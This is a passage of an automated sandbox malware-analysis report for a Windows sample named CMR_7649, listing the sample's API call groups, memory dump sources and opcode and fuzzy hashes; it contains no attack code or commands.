                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcscpy$_wcscat
                                                • String ID:
                                                • API String ID: 2037614760-0
                                                • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Variant$Copy$AllocClearErrorLastString
                                                • String ID:
                                                • API String ID: 960795272-0
                                                • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                APIs
                                                • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                • String ID:
                                                • API String ID: 4189319755-0
                                                • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                APIs
                                                • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow$InvalidateRect
                                                • String ID:
                                                • API String ID: 1976402638-0
                                                • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                APIs
                                                • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                Strings
                                                Similarity
                                                • API ID: Variant$Copy$ClearErrorLast
                                                • String ID: NULL Pointer assignment$Not an Object type
                                                • API String ID: 2487901850-572801152
                                                • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                APIs
                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                Similarity
                                                • API ID: Window$Enable$Show$MessageSend
                                                • String ID:
                                                • API String ID: 1871949834-0
                                                • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                APIs
                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                • SendMessageW.USER32 ref: 00471AE3
                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                Similarity
                                                • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                • String ID:
                                                • API String ID: 3611059338-0
                                                • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                Similarity
                                                • API ID: DestroyWindow$DeleteObject$IconMove
                                                • String ID:
                                                • API String ID: 1640429340-0
                                                • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                APIs
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • _wcslen.LIBCMT ref: 004438CD
                                                • _wcslen.LIBCMT ref: 004438E6
                                                • _wcstok.LIBCMT ref: 004438F8
                                                • _wcslen.LIBCMT ref: 0044390C
                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                • _wcstok.LIBCMT ref: 00443931
                                                Similarity
                                                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                • String ID:
                                                • API String ID: 3632110297-0
                                                • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                Similarity
                                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                                • String ID:
                                                • API String ID: 752480666-0
                                                • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                • String ID:
                                                • API String ID: 3275902921-0
                                                • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                • String ID:
                                                • API String ID: 3275902921-0
                                                • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                APIs
                                                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                APIs
                                                • SendMessageW.USER32 ref: 004555C7
                                                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Similarity
                                                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                • String ID:
                                                • API String ID: 3691411573-0
                                                • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                APIs
                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                • LineTo.GDI32(?,?,?), ref: 004472AC
                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                • LineTo.GDI32(?,?,?), ref: 004472C6
                                                • EndPath.GDI32(?), ref: 004472D6
                                                • StrokePath.GDI32(?), ref: 004472E4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                • String ID:
                                                • API String ID: 372113273-0
                                                • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                APIs
                                                • GetDC.USER32(00000000), ref: 0044CC6D
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CapsDevice$Release
                                                • String ID:
                                                • API String ID: 1035833867-0
                                                • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                APIs
                                                • __getptd.LIBCMT ref: 0041708E
                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                • __amsg_exit.LIBCMT ref: 004170AE
                                                • __lock.LIBCMT ref: 004170BE
                                                • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                • _free.LIBCMT ref: 004170EE
                                                • InterlockedIncrement.KERNEL32(00A02CE0), ref: 00417106
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                • String ID:
                                                • API String ID: 3470314060-0
                                                • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                • ExitThread.KERNEL32 ref: 004151ED
                                                • __freefls@4.LIBCMT ref: 00415209
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                • String ID:
                                                • API String ID: 442100245-0
                                                • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
